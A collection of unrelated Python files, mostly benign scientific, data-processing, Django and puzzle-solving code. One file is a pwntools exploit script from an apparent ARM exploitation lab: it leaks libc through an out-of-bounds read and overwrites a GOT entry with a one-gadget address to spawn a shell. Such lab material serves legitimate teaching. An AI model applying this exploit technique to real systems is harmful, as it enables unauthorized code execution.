self._H_dep = H_dep = RT*(T*(2.0*V*self.dB_dT() + self.dC_dT())/(2.0*V2)
- (-1.0 + (V2 + V*self.B() + self.C())/V2))
return H_dep
def dH_dep_dT(self):
r'''
.. math::
\frac{\partial H_{dep}}{\partial T} = \frac{R \left(2 T^{2} V
\frac{d^{2}}{d T^{2}} B{\left(T \right)} + T^{2} \frac{d^{2}}{d T^{2}}
C{\left(T \right)} + 2 T V \frac{d}{d T} B{\left(T \right)}
- 2 V B{\left(T \right)} - 2 C{\left(T \right)}\right)}{2 V^{2}}
'''
try:
return self._dH_dep_dT
except:
pass
T, V = self.T, self._V
self._dH_dep_dT = dH_dep_dT = (self.R*(2.0*T*T*V*self.d2B_dT2() + T*T*self.d2C_dT2()
+ 2.0*T*V*self.dB_dT() - 2.0*V*self.B() - 2.0*self.C())/(2.0*V*V))
return dH_dep_dT
def S_dep(self):
r'''
.. math::
S_{dep} = \frac{R \left(- T \frac{d}{d T} C{\left(T \right)} + 2 V^{2}
\ln{\left(\frac{V^{2} + V B{\left(T \right)} + C{\left(T \right)}}
{V^{2}} \right)} - 2 V \left(T \frac{d}{d T} B{\left(T \right)}
+ B{\left(T \right)}\right) - C{\left(T \right)}\right)}{2 V^{2}}
'''
'''
dP_dT = diff(P_sln, T)
S_dep = integrate(dP_dT - R/V, (V, oo, V)) + R*log(Z)
'''
try:
return self._S_dep
except:
pass
T, V = self.T, self._V
V2 = V*V
self._S_dep = S_dep = (self.R*(-T*self.dC_dT() + 2*V2*log((V2 + V*self.B() + self.C())/V**2)
- 2*V*(T*self.dB_dT() + self.B()) - self.C())/(2*V2))
return S_dep
def dS_dep_dT(self):
r'''
.. math::
\frac{\partial S_{dep}}{\partial T} = \frac{R \left(2 V^{2} \left(V
\frac{d}{d T} B{\left(T \right)} + \frac{d}{d T} C{\left(T \right)}
\right) - \left(V^{2} + V B{\left(T \right)} + C{\left(T \right)}
\right) \left(T \frac{d^{2}}{d T^{2}} C{\left(T \right)} + 2 V
\left(T \frac{d^{2}}{d T^{2}} B{\left(T \right)} + 2 \frac{d}{d T}
B{\left(T \right)}\right) + 2 \frac{d}{d T} C{\left(T \right)}
\right)\right)}{2 V^{2} \left(V^{2} + V B{\left(T \right)}
+ C{\left(T \right)}\right)}
'''
try:
return self._dS_dep_dT
except:
pass
T, V = self.T, self._V
V2 = V*V
self._dS_dep_dT = dS_dep_dT = (self.R*(2.0*V2*(V*self.dB_dT() + self.dC_dT()) - (V2 + V*self.B() + self.C())*(T*self.d2C_dT2()
+ 2.0*V*(T*self.d2B_dT2() + 2.0*self.dB_dT()) + 2.0*self.dC_dT()))/(2.0*V2*(V2 + V*self.B() + self.C())))
return dS_dep_dT
def to_TP_zs(self, T, P, zs):
new = self.__class__.__new__(self.__class__)
new.T = T
new.P = P
new.zs = zs
new.N = self.N
new.HeatCapacityGases = self.HeatCapacityGases
new.model = self.model
new.Hfs = self.Hfs
new.Gfs = self.Gfs
new.Sfs = self.Sfs
Z = Z_from_virial_density_form(T, P, new.B(), new.C())
new._V = Z*self.R*T/P
return new
def to(self, zs, T=None, P=None, V=None):
new = self.__class__.__new__(self.__class__)
new.zs = zs
new.N = self.N
new.HeatCapacityGases = self.HeatCapacityGases
new.model = model = self.model
new.Hfs = self.Hfs
new.Gfs = self.Gfs
new.Sfs = self.Sfs
if T is not None:
new.T = T
if P is not None:
new.P = P
Z = Z_from_virial_density_form(T, P, new.B(), new.C())
new._V = Z*self.R*T/P
elif V is not None:
P = new.P = self.R*T*(V*V + V*new.B() + new.C())/(V*V*V)
new._V = V
elif P is not None and V is not None:
new.P = P
# PV specified, solve for T
def err(T):
# Solve for P matching; probably there is a better solution here that does not
# require the cubic solution but this works for now
# TODO: instead of using self.to_TP_zs to allow calculating B and C,
# they should be functional
new_tmp = self.to_TP_zs(T=T, P=P, zs=zs)
B = new_tmp.B()
C = new_tmp.C()
x2 = V*V + V*B + C
x3 = self.R/(V*V*V)
P_err = T*x2*x3 - P
dP_dT = x3*(T*(V*new_tmp.dB_dT() + new_tmp.dC_dT()) + x2)
return P_err, dP_dT
T_ig = P*V/self.R # guess
T = newton(err, T_ig, fprime=True, xtol=1e-15)
new.T = T
else:
raise ValueError("Two of T, P, or V are needed")
return new
def B(self):
try:
return self._B
except:
pass
N = self.N
T = self.T
if N == 1:
return self.model.B_pures(T)[0]
zs = self.zs
B_matrix = self.model.B_matrix(T)
B = 0.0
for i in range(N):
B_tmp = 0.0
row = B_matrix[i]
for j in range(N):
B += zs[j]*row[j]
B += zs[i]*B_tmp
self._B = B
return B
def dB_dT(self):
try:
return self._dB_dT
except:
pass
N = self.N
T = self.T
if N == 1:
return self.model.dB_dT_pures(T)[0]
zs = self.zs
dB_dT_matrix = self.model.dB_dT_matrix(T)
dB_dT = 0.0
for i in range(N):
dB_dT_tmp = 0.0
row = dB_dT_matrix[i]
for j in range(N):
dB_dT += zs[j]*row[j]
dB_dT += zs[i]*dB_dT_tmp
self._dB_dT = dB_dT
return dB_dT
def d2B_dT2(self):
try:
return self._d2B_dT2
except:
pass
N = self.N
T = self.T
if N == 1:
return self.model.d2B_dT2_pures(T)[0]
zs = self.zs
d2B_dT2_matrix = self.model.d2B_dT2_matrix(T)
d2B_dT2 = 0.0
for i in range(N):
d2B_dT2_tmp = 0.0
row = d2B_dT2_matrix[i]
for j in range(N):
d2B_dT2 += zs[j]*row[j]
d2B_dT2 += zs[i]*d2B_dT2_tmp
self._d2B_dT2 = d2B_dT2
return d2B_dT2
def C(self):
try:
return self._C
except:
pass
T = self.T
zs = self.zs
C_pures = self.model.C_pures(T)
Ciij, Cijj = self.model.C_interactions(T)
C = 0.0
N = self.N
for i in range(N):
for j in range(N):
# poling 5-4.3b should be able to be used to take out the k loop?
for k in range(N):
if i == j == k:
Cval = C_pures[i]
elif i == j:
Cval = Ciij[i][j]
else:
Cval = Cijj[i][j]
C += zs[i]*zs[j]*zs[k]*Cval
self._C = C
return C
def dC_dT(self):
try:
return self._dC_dT
except:
pass
T = self.T
zs = self.zs
dC_dT_pures = self.model.dC_dT_pures(T)
dC_dTiij, dC_dTijj = self.model.dC_dT_interactions(T)
dC_dT = 0.0
N = self.N
for i in range(N):
for j in range(N):
# poling 5-4.3b should be able to be used to take out the k loop?
for k in range(N):
if i == j == k:
dC_dTval = dC_dT_pures[i]
elif i == j:
dC_dTval = dC_dTiij[i][j]
else:
dC_dTval = dC_dTijj[i][j]
dC_dT += zs[i]*zs[j]*zs[k]*dC_dTval
self._dC_dT = dC_dT
return dC_dT
def d2C_dT2(self):
try:
return self._d2C_dT2
except:
pass
T = self.T
zs = self.zs
d2C_dT2_pures = self.model.d2C_dT2_pures(T)
d2C_dT2iij, d2C_dT2ijj = self.model.d2C_dT2_interactions(T)
d2C_dT2 = 0.0
N = self.N
for i in range(N):
for j in range(N):
# poling 5-4.3b should be able to be used to take out the k loop?
for k in range(N):
if i == j == k:
d2C_dT2val = d2C_dT2_pures[i]
elif i == j:
d2C_dT2val = d2C_dT2iij[i][j]
else:
d2C_dT2val = d2C_dT2ijj[i][j]
d2C_dT2 += zs[i]*zs[j]*zs[k]*d2C_dT2val
self._d2C_dT2 = d2C_dT2
return d2C_dT2
| StarcoderdataPython |
1728565 | <gh_stars>1-10
import pandas as pd
import numpy as np
'''
This module contains several normalization methods.
See ReadMe.md for usage example.
'''
def zero_one_normalize(df: pd.DataFrame, excluded_colnames: list = None) -> pd.DataFrame:
"""
Applies the MinMaxScaler from the module sklearn.preprocessing to find
the min and max of each column and transforms the values into the range
of [0,1]. The transformation is given by::
X_scaled = (X - X.min(axis=0)) / ranges
where::
range = X.max(axis=0) - X.min(axis=0)
Note: In case multiple dataframes are used (i.e., several partitions of
the dataset in training and testing), make sure that all of them will
be passed to this method at once, and as one single dataframe. Otherwise,
the normalization will be carried out on local (as opposed to global)
extrema, which is incorrect.
:param df: The dataframe to be normalized.
:param excluded_colnames: The name of non-numeric columns (e.g. TimeStamp,
ID etc.) that must be excluded before normalization takes place.
They will be added back to the normalized data.
:return: The same dataframe as input, with the label column unchanged,
except that now the numerical values are transformed into a [0, 1] range.
"""
from sklearn.preprocessing import MinMaxScaler
excluded_colnames = excluded_colnames if excluded_colnames else []
colnames_original_order = list(df)
# Separate data (numeric) from those to be excluded (ids and class_labels)
included_cnames = [colname for colname in list(df) if colname not in excluded_colnames]
# Exclude all non-numeric columns
df_numeric = df[included_cnames].select_dtypes(include=np.number)
# set-difference between the original and numeric columns
excluded_cnames = list(set(colnames_original_order) - set(list(df_numeric)))
df_excluded = df[excluded_cnames]
# prepare normalizer and normalize
scaler = MinMaxScaler()
res_ndarray = scaler.fit_transform(df_numeric)
df_numeric = pd.DataFrame(res_ndarray, columns=list(df_numeric), dtype=float)
# Reset the indices (so that they match)
df_excluded.reset_index()
df_numeric.reset_index()
# Add the excluded columns back
df_norm = df_excluded.join(df_numeric)
# Restore the original oder of columns
df_norm = df_norm[colnames_original_order]
return df_norm
def negativeone_one_normalize(df: pd.DataFrame, excluded_colnames: list = None) -> pd.DataFrame:
"""
Applies the `MinMaxScaler` from the module `sklearn.preprocessing` to find
the min and max of each column and transforms the values into the range
of [-1,1]. The transformation is given by::
X_scaled = scale * X - 1 - X.min(axis=0) * scale
where::
scale = 2 / (X.max(axis=0) - X.min(axis=0))
Note: In case multiple dataframes are used (i.e., several partitions of
the dataset in training and testing), make sure that all of them will
be passed to this method at once, and as one single dataframe. Otherwise,
the normalization will be carried out on local (as opposed to global)
extrema, which is incorrect.
:param df: The dataframe to be normalized.
:param excluded_colnames: The name of non-numeric columns (e.g. TimeStamp,
ID etc) that must be excluded before normalization takes place.
They will be added back to the normalized data.
:return: The same dataframe as input, with the label column unchanged,
except that now the numerical values are transformed into a [-1, 1] range.
"""
from sklearn.preprocessing import MinMaxScaler
excluded_colnames = excluded_colnames if excluded_colnames else []
colnames_original_order = list(df)
# Separate data (numeric) from those to be excluded (ids and class_labels)
included_cnames = [colname for colname in list(df) if colname not in excluded_colnames]
# Exclude all non-numeric columns
df_numeric = df[included_cnames].select_dtypes(include=np.number)
# set-difference between the original and numeric columns
excluded_cnames = list(set(colnames_original_order) - set(list(df_numeric)))
df_excluded = df[excluded_cnames]
# prepare normalizer and normalize
scaler = MinMaxScaler((-1, 1))
res_ndarray = scaler.fit_transform(df_numeric)
df_numeric = pd.DataFrame(res_ndarray, columns=list(df_numeric), dtype=float)
# Reset the indices (so that they match)
df_excluded.reset_index()
df_numeric.reset_index()
# Add the excluded columns back
df_norm = df_excluded.join(df_numeric)
# Restore the original oder of columns
df_norm = df_norm[colnames_original_order]
return df_norm
def standardize(df: pd.DataFrame, excluded_colnames: list = None) -> pd.DataFrame:
"""
Applies the StandardScaler from the module sklearn.preprocessing by
removing the mean and scaling to unit variance. The transformation
is given by:
.. math::
z = (x - u) / s
where `x` is a feature vector, `u` is the mean of the vector, and `s`
represents its standard deviation.
Note: In case multiple dataframes are used (i.e., several partitions of
the dataset in training and testing), make sure that all of them will
be passed to this method at once, and as one single dataframe. Otherwise,
the normalization will be carried out on local (as opposed to global)
extrema, which is incorrect.
:param df: The dataframe to be normalized.
:param excluded_colnames: The name of non-numeric columns (e.g. TimeStamp,
ID etc) that must be excluded before normalization takes place. They will
be added back to the normalized data.
:return: The same dataframe as input, with the label column unchanged,
except that now the numeric values are transformed into a range with mean
at 0 and unit standard deviation.
"""
from sklearn.preprocessing import StandardScaler
excluded_colnames = excluded_colnames if excluded_colnames else []
colnames_original_order = list(df)
# Separate data (numeric) from those to be excluded (ids and class_labels)
included_cnames = [colname for colname in list(df) if colname not in excluded_colnames]
# Exclude all non-numeric columns
df_numeric = df[included_cnames].select_dtypes(include=np.number)
# set-difference between the original and numeric columns
excluded_cnames = list(set(colnames_original_order) - set(list(df_numeric)))
df_excluded = df[excluded_cnames]
# prepare normalizer and normalize
scaler = StandardScaler()
res_ndarray = scaler.fit_transform(df_numeric)
df_numeric = pd.DataFrame(res_ndarray, columns=list(df_numeric), dtype=float)
# Reset the indices (so that they match)
df_excluded.reset_index()
df_numeric.reset_index()
# Add the excluded columns back
df_norm = df_excluded.join(df_numeric)
# Restore the original oder of columns
df_norm = df_norm[colnames_original_order]
return df_norm
def robust_standardize(df: pd.DataFrame, excluded_colnames: list = None) -> pd.DataFrame:
"""
Applies the RobustScaler from the module sklearn.preprocessing by
removing the median and scaling the data according to the quantile
range (IQR). This transformation is robust to outliers.
Note: In case multiple dataframes are used (i.e., several partitions of
the dataset in training and testing), make sure that all of them will
be passed to this method at once, and as one single dataframe. Otherwise,
the normalization will be carried out on local (as opposed to global)
extrema, hence unrepresentative IQR. This is a bad practice.
:param df: The dataframe to be normalized.
:param excluded_colnames: The name of non-numeric (e.g., TimeStamp,
ID etc.) that must be excluded before normalization takes place.
They will be added back to the normalized data.
:return: The same dataframe as input, with the label column unchanged,
except that now the numerical values are transformed into new range
determined by IQR.
"""
from sklearn.preprocessing import RobustScaler
excluded_colnames = excluded_colnames if excluded_colnames else []
colnames_original_order = list(df)
# Separate data (numeric) from those to be excluded (ids and class_labels)
included_cnames = [colname for colname in list(df) if colname not in excluded_colnames]
# Exclude all non-numeric columns
df_numeric = df[included_cnames].select_dtypes(include=np.number)
# set-difference between the original and numeric columns
excluded_cnames = list(set(colnames_original_order) - set(list(df_numeric)))
df_excluded = df[excluded_cnames]
# prepare normalizer and normalize
scaler = RobustScaler()
res_ndarray = scaler.fit_transform(df_numeric)
df_numeric = pd.DataFrame(res_ndarray, columns=list(df_numeric), dtype=float)
# Reset the indices (so that they match)
df_excluded.reset_index()
df_numeric.reset_index()
# Add the excluded columns back
df_norm = df_excluded.join(df_numeric)
# Restore the original oder of columns
df_norm = df_norm[colnames_original_order]
return df_norm
| StarcoderdataPython |
3203062 | <gh_stars>1-10
from django.urls import path
# from django.urls import include
from . import views
urlpatterns = [
path('index.html',views.index,name='index'),
path('',views.index,name='index'),
] | StarcoderdataPython |
1713365 | <reponame>jaredlwong/sudoku
"""This solution is a simple bfs with grids being copied using np.array"""
from __future__ import annotations
from typing import FrozenSet
from typing import Iterator
from typing import List
from typing import NewType
from typing import Optional
from typing import Tuple
import time
import sys
import numpy as np
class SudokuParser(object):
@staticmethod
def read_from_file(fn):
pass
@staticmethod
def parse_str(s):
grid = [[int(c) for c in row] for row in s.split('\n') if row]
np_grid = np.zeros(81)
for i in range(9):
for j in range(9):
np_grid[i*9+j] = grid[i][j]
return Sudoku(np_grid)
class Sudoku(object):
indexes = (1, 2, 3, 4, 5, 6, 7, 8, 9)
def __init__(self, grid):
self._grid = grid
def get(self, row: int, col: int) -> int:
return self._grid[(row-1)*9+(col-1)]
def copy_and_set(self, row: int, col: int, v: int) -> Sudoku:
new_grid = self._grid.copy()
new_grid[(row-1)*9+(col-1)] = v
return Sudoku(new_grid)
def row(self, r: int) -> Iterator[int]:
"""Return row (1-indexed)"""
return (self.get(r, c) for c in Sudoku.indexes)
def col(self, c: int) -> Iterator[int]:
"""Return row (1-indexed)"""
return (self.get(r, c) for r in Sudoku.indexes)
def rows(self) -> Iterator[Iterator[int]]:
"""Return each row for each yield"""
for r in Sudoku.indexes:
yield self.row(r)
def cols(self) -> Iterator[Iterator[int]]:
"""Return each col for each yield"""
for c in Sudoku.indexes:
yield self.col(c)
def box(self, b: int) -> Iterator[int]:
r_box = (b - 1) // 3
c_box = (b - 1) % 3
for r in range(r_box * 3, r_box * 3 + 3):
for c in range(c_box * 3, c_box * 3 + 3):
yield self.get(r+1, c+1)
def boxes(self) -> Iterator[Iterator[int]]:
for b in Sudoku.indexes:
yield self.box(b)
class SudokuSolver(object):
@staticmethod
def grp_okay(grp: Iterator[int]) -> bool:
grp_minus_zeros = [x for x in grp if x != 0]
return len(grp_minus_zeros) == len(set(grp_minus_zeros))
@staticmethod
def sudoku_possible(sudoku: Sudoku) -> bool:
if not all(SudokuSolver.grp_okay(row) for row in sudoku.rows()):
return False
if not all(SudokuSolver.grp_okay(col) for col in sudoku.cols()):
return False
if not all(SudokuSolver.grp_okay(box) for box in sudoku.boxes()):
return False
return True
@staticmethod
def sudoku_complete(sudoku: Sudoku) -> bool:
return all(c != 0 for row in sudoku.rows() for c in row)
@staticmethod
def sudoku_gen_next(sudoku: Sudoku) -> List[Sudoku]:
position = SudokuSolver.next_open(sudoku)
if not position:
return []
r, c = position
return [sudoku.copy_and_set(r, c, k) for k in range(1, 10)]
@staticmethod
def next_open(sudoku: Sudoku) -> Optional[Tuple[int, int]]:
for i in range(1, 10):
for j in range(1, 10):
if sudoku.get(i, j) == 0:
return i, j
return None
@staticmethod
def sudoku_solve(sudoku: Sudoku) -> Optional[Sudoku]:
queue = SudokuSolver.sudoku_gen_next(sudoku)
while len(queue) > 0:
s = queue.pop()
if not SudokuSolver.sudoku_possible(s):
continue
if SudokuSolver.sudoku_complete(s):
return s
queue.extend(SudokuSolver.sudoku_gen_next(s))
return None
# sudoku_puzzle = '''
# 070050010
# 000028600
# 200000000
# 000006000
# 530000007
# 080090040
# 600000081
# 005300000
# 000009370
# '''
sudoku_puzzle = '''
801340000
430800107
000060003
208050009
009000700
600070804
300010000
105006042
000024308
'''
if __name__ == '__main__':
sudoku: Sudoku = SudokuParser.parse_str(sudoku_puzzle)
solved: Optional[Sudoku] = SudokuSolver.sudoku_solve(sudoku)
if solved:
print(solved._grid)
else:
print(sudoku._grid)
| StarcoderdataPython |
1694599 | <reponame>polymathnexus5/solid-rotary-phone<filename>src/decision_tree.py
from sklearn import datasets
from sklearn.metrics import confusion_matrix
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeClassifier
from sklearn.preprocessing import LabelEncoder
from keras.utils import np_utils
import pandas as pd
import numpy as np
import matrix_plot
import matplotlib.pyplot as plt
seed = 8
np.random.seed(seed)
def feature_normalize(dataset):
return (dataset - np.mean(dataset, axis=0))/np.std(dataset, axis=0)
df = pd.read_excel('data/all_data_2.xlsx', header=None)
input = df.as_matrix()
#X=input.reshape((150,25))
X_norm = feature_normalize(input).reshape((150,25))
#X_norm = feature_normalize(input.reshape((150,25)))
X = X_norm
Y = np.ones((150), np.float32)
for i in range(0,Y.shape[0],50):
if (i == 0):
Y[0:50] = Y[0:50]*0
if (i == 0):
Y[100:] = Y[100:]*2
'''
#X=input.reshape((75,50))
X_norm = feature_normalize(input).reshape((75,50))
X = X_norm
Y = np.ones((75), np.float32)
for i in range(0,Y.shape[0],25):
if (i == 0):
Y[0:25] = Y[0:25]*0
if (i == 0):
Y[50:] = Y[50:]*2
'''
class_names = ['man','hand','eye']
X_train, X_test, y_train, y_test = train_test_split(X, Y)
dtree_model = DecisionTreeClassifier(max_depth = 4).fit(X_train, y_train)
dtree_predictions = dtree_model.predict(X_test)
cm = confusion_matrix(y_test, dtree_predictions)
# Plot normalized confusion matrix
matrix_plot.plot_confusion_matrix(y_test, dtree_predictions, classes=class_names, normalize=True,
title='Decision Tree From Session 1 Data')
plt.show()
count = 0
for i in range (y_test.shape[0]):
if y_test[i] == dtree_predictions[i]:
#print(dtree_predictions[i])
#print(y_test[i])
count += 1
#print(count)
#print(count)
#print(y_test.shape[0])
print("Train Count: ", y_train.shape)
print("============================")
print("Test Count: ", y_test.shape)
print("============================")
print("Results: ", dtree_predictions)
print("============================")
print("True Values: ", y_test)
print("============================")
print("accuracy: ", count*100/y_test.shape[0])
print("============================")
df2 = pd.read_excel('data/all_data.xlsx', header=None)
input2 = df2.as_matrix()
#X2=input2.reshape((144,25))
X_norm2 = feature_normalize(input2).reshape((144,25))
#X_norm2 = feature_normalize(input2.reshape((144,25)))
X2 = X_norm2
Y2 = np.ones((144), np.float32)
for i in range(0,Y2.shape[0],48):
if (i == 0):
Y2[0:48] = Y2[0:48]*2
if (i == 0):
Y2[96:] = Y2[96:]*0
'''
#X2=input2.reshape((72,50))
X_norm2 = feature_normalize(input2).reshape((72,50))
X2 = X_norm2
Y2 = np.ones((72), np.float32)
for i in range(0,Y2.shape[0],24):
if (i == 0):
Y2[0:24] = Y2[0:24]*2
if (i == 0):
Y2[48:] = Y2[48:]*0
'''
X_train2, X_test2, y_train2, y_test2 = train_test_split(X2, Y2, test_size=0.9)
dtree_predictions2 = dtree_model.predict(X_test2)
cm2 = confusion_matrix(y_test2, dtree_predictions2)
# Plot normalized confusion matrix
matrix_plot.plot_confusion_matrix(y_test2, dtree_predictions2, classes=class_names, normalize=True,
title='Decision Tree From session 1 Used On Session 2')
plt.show()
count2 = 0
for i in range (y_test2.shape[0]):
if y_test2[i] == dtree_predictions2[i]:
#print(dtree_predictions[i])
#print(y_test[i])
count2 += 1
#print(count)
#print(count)
#print(y_test.shape[0])
print("Results: ", dtree_predictions2)
print("============================")
print("True Values: ", y_test2)
print("============================")
print("accuracy: ", count*100/y_test2.shape[0])
print("============================") | StarcoderdataPython |
4823122 | <reponame>peyang-Celeron/ServerTemplate.py<filename>src/utils/token.py
import os
from secrets import token_bytes
from blake3 import blake3
class Token:
def __init__(self, file):
self.file = file
self.token = None
@property
def loaded(self):
if not os.path.exists(self.file):
return False
with open(self.file, "rb") as r:
self.token = r.read().decode("utf-8")
return True
def save(self, token):
with open(self.file, "w") as r:
r.write(token)
def generate(self):
if self.token is not None:
return self.token
if os.path.exists(self.file) and self.loaded:
return self.token
token = token_bytes(32)
hash_token = blake3(token).hexdigest()
self.save(hash_token)
self.token = hash_token
return hash_token
def validate(self, token):
return self.token == blake3(token).hexdigest()
| StarcoderdataPython |
3356266 | #!/usr/bin/env python
# encoding: utf-8
# <NAME>, 2008
# <NAME>, 2008 (ita)
import TaskGen
from TaskGen import taskgen, feature
from Constants import *
TaskGen.declare_chain(
name = 'luac',
rule = '${LUAC} -s -o ${TGT} ${SRC}',
ext_in = '.lua',
ext_out = '.luac',
reentrant = False,
install = 'LUADIR', # env variable
)
@feature('lua')
def init_lua(self):
self.default_chmod = O755
def detect(conf):
conf.find_program('luac', var='LUAC', mandatory = True)
| StarcoderdataPython |
1741601 | from django.contrib import admin
from .models import Question, Option
admin.site.register(Question)
admin.site.register(Option)
| StarcoderdataPython |
62551 | import torch
import cv2 as cv
import numpy as np
from sklearn.neighbors import NearestNeighbors
from .model_utils import spread_feature
def optimize_image_mask(image_mask, sp_image, nK=4, th=1e-2):
mask_pts = image_mask.reshape(-1)
xyz_pts = sp_image.reshape(-1, 3)
xyz_pts = xyz_pts[mask_pts > 0.5, :]
Neighbors = NearestNeighbors(n_neighbors=nK + 1, algorithm='kd_tree').fit(xyz_pts)
nn_dist, nn_idx = Neighbors.kneighbors(xyz_pts) # N,nK
nn_dist = nn_dist[:, 1:]
valid = (np.sum((nn_dist < th).astype(np.float), axis=1) == nK).astype(np.float)
optimized_mask = image_mask.reshape(-1)
optimized_mask[mask_pts > 0.5] = valid
optimized_mask = optimized_mask.reshape(image_mask.shape[0], image_mask.shape[1])
return optimized_mask
def generate_final_mask(image_learned_uv, image_mask,
image_resize_factor, mask_container_low_res, final_gim):
"""
Post Process Algorithm to generate mask of the unwrapped chart
Parameters
----------
image_learned_uv: [H,W,2]
image_mask: [H,W]
image_resize_factor: float
mask_container_low_res: a predefined tensor with intermediate low resolution
final_gim: a predefined tensor with target high resolution
"""
# resize (larger) rgb and uv with Bi-linear up-sampling
resized_uv = cv.resize(image_learned_uv, dsize=(image_resize_factor * image_learned_uv.shape[0],
image_resize_factor * image_learned_uv.shape[1]),
interpolation=cv.INTER_LINEAR)
resized_mask = cv.resize(image_mask, dsize=(image_resize_factor * image_learned_uv.shape[0],
image_resize_factor * image_learned_uv.shape[1]),
interpolation=cv.INTER_LINEAR)
resized_mask = (resized_mask > 0.5).astype(np.float)
# use gradient to remove the edge
discontinuous_mask_u = cv.Laplacian(image_learned_uv[..., 0], ddepth=cv.CV_32F) # small gradient map
discontinuous_mask_v = cv.Laplacian(image_learned_uv[..., 1], ddepth=cv.CV_32F) # small gradient map
# use the max and min in latent u and v to find the threshhold
u_max = (image_learned_uv[..., 0] * image_mask).max()
v_max = (image_learned_uv[..., 1] * image_mask).max()
u_min = (image_learned_uv[..., 0] * image_mask + (1.0 - image_mask)).min()
v_min = (image_learned_uv[..., 1] * image_mask + (1.0 - image_mask)).min()
u_th = (u_max - u_min) / 30
v_th = (v_max - v_min) / 30
discontinuous_mask_u = (discontinuous_mask_u > u_th).astype(np.float) * image_mask
discontinuous_mask_v = (discontinuous_mask_v > v_th).astype(np.float) * image_mask
discontinuous_mask = ((discontinuous_mask_u + discontinuous_mask_v) > 0).astype(np.float)
# use the mask to remove the boundary
boundary_recovery_mask = (cv.Laplacian(image_mask, ddepth=cv.CV_32F) > 0.01).astype(np.float)
discontinuous_mask = discontinuous_mask * (1.0 - boundary_recovery_mask)
resized_discontinuous_mask = cv.resize(discontinuous_mask,
dsize=(image_resize_factor * image_learned_uv.shape[0],
image_resize_factor * image_learned_uv.shape[1]),
interpolation=cv.INTER_NEAREST)
# make the small mask & texture
high_res_mask = torch.from_numpy(resized_mask * (1.0 - resized_discontinuous_mask)) \
.unsqueeze(0).unsqueeze(0).cuda().float() # 1,1,R,R
high_res_uv = torch.from_numpy(resized_uv).permute(2, 0, 1).unsqueeze(0).cuda().float()
low_res_mask = mask_container_low_res.cuda()
low_res_mask = spread_feature(low_res_mask, high_res_uv, high_res_mask, high_res_mask)
# use close to remove the holes in small mask and then resize
low_res_mask_closed = low_res_mask.detach().cpu().squeeze(0).squeeze(0).numpy() # R,R
close_k_size = int(final_gim.shape[2] / 100)
close_kernel = cv.getStructuringElement(cv.MORPH_ELLIPSE, (close_k_size, close_k_size))
final_mask_np = cv.resize(low_res_mask_closed, dsize=(final_gim.shape[2],
final_gim.shape[2]),
interpolation=cv.INTER_NEAREST) # R,R,3
final_mask_np = (final_mask_np > 0).astype(np.float)
final_mask_np = cv.morphologyEx(final_mask_np, cv.MORPH_OPEN, close_kernel)
return final_mask_np
def generate_texture(sp_image, full_gim, image_rgb, image_mask, final_mask_np, final_res, nK=4, th=1e-2):
# prepare root and query points form the image and from the high-res chart
root_xyz_np = sp_image.reshape(-1, 3) # H*W,3
root_rgb_np = image_rgb.reshape(-1, 3) # H*W,3
_image_mask = image_mask.reshape(-1) # H*W
root_xyz_np = root_xyz_np[_image_mask > 0.5, :] # M,2 [0,1]
root_rgb_np = root_rgb_np[_image_mask > 0.5, :] # M,3 [0,1]
query_xyz_np = full_gim.reshape(-1, 3) # R*R,3
_final_mask_np = final_mask_np.reshape(-1) # R*R
query_xyz_np = query_xyz_np[_final_mask_np > 0.5, :] # N,3 [0,1]
# finding nearest root pixel points
Neighbors = NearestNeighbors(n_neighbors=nK, algorithm='kd_tree').fit(root_xyz_np)
nn_dist, nn_idx = Neighbors.kneighbors(query_xyz_np) # N,nK
# optimize the gim mask
valid = (nn_dist[:, 0] < th).astype(np.float)
optimized_final_mask_np = final_mask_np.reshape(-1).copy()
optimized_final_mask_np[_final_mask_np > 0.5] = valid
optimized_final_mask_np = optimized_final_mask_np.reshape(final_mask_np.shape[0], final_mask_np.shape[1])
# do interpolation based on chart distance
interpolation_weight = nn_dist.copy()
interpolation_weight = 1 - interpolation_weight / np.sum(interpolation_weight, 1, keepdims=True)
interpolation_weight = interpolation_weight / np.sum(interpolation_weight, 1, keepdims=True)
query_rgb_np = np.zeros((query_xyz_np.shape[0], 3))
for kdx in range(nK):
nn_color = root_rgb_np[nn_idx[:, kdx], :]
query_rgb_np += nn_color * interpolation_weight[:, kdx][..., np.newaxis]
final_texture_np = np.ones((final_res ** 2, 3))
final_texture_np[_final_mask_np > 0.5, :] = query_rgb_np
final_texture_np = final_texture_np.reshape(final_res, final_res, 3)
return final_texture_np, optimized_final_mask_np | StarcoderdataPython |
18466 | """from django.contrib import admin
from .models import DemoModel
admin.site.register(DemoModel)"""
| StarcoderdataPython |
3387349 | class Solution:
def permuteUnique(self, nums: List[int]) -> List[List[int]]:
self.result = []
nums.sort()
visited = [False] * len(nums)
self.dfs(nums, [], visited)
return self.result
def dfs(self, nums, cur, visited):
if len(cur) == len(nums):
self.result.append(cur)
return
for i in range(len(nums)):
if i > 0 and nums[i] == nums[i - 1] and not visited[i - 1]:
continue
elif not visited[i]:
visited[i] = True
self.dfs(nums, cur + [nums[i]], visited)
visited[i] = False
return
| StarcoderdataPython |
178017 | <filename>interfaces/python/test/nodes_test.py
import ell
def test():
print("nodes_test.test -- TBD")
return 0
| StarcoderdataPython |
127208 | <filename>Episode3/exploits/exploit_got.py
#!/usr/bin/env python2
from pwn import *
ip = "192.168.0.13"
port = 22
user = "pi"
pwd = "<PASSWORD>"
libc = ELF('libc-2.24.so')
gadget_offset = 0xed748
shell = ssh(user, ip, password=<PASSWORD>, port=port)
sh = shell.run('/home/pi/arm/episode3/got_overw')
# fill the array
sh.recvuntil('array:\n')
sh.sendline('1852400175') # "nib/"
sh.sendline('6845231') # "hs/"
for i in range(0,10):
sh.sendline(str(i))
sh.recvuntil('read: \n')
# Leak the libc address
sh.sendline('-9') # offset to the libc in the GOT section
ret = sh.recvline().split()
libc_main = int(ret[6])
# libc_base = libc_main - libc_base_offset
libc_base = libc_main - libc.symbols['__libc_start_main']
log.info('libcbase: %#x' % libc_base)
# address of the system function
system_addr = libc_base + libc.symbols['system']
log.info('system address: %#x' % system_addr)
sh.recvuntil('[y/n]\n')
# do not read other values
sh.sendline('n')
sh.recvuntil('modify?\n')
# send the system function address
sh.sendline(str(system_addr))
sh.recvuntil('modify\n')
sh.sendline('-10') # offset of the put in the GOT section
sh.recvuntil('value\n')
# gadget address
gadget_address = libc_base + gadget_offset
log.info('gadget address: %#x' % gadget_address)
# send the gadget address
sh.sendline(str(gadget_address))
sh.interactive()
shell.close()
| StarcoderdataPython |
1706177 | # The MIT License (MIT)
#
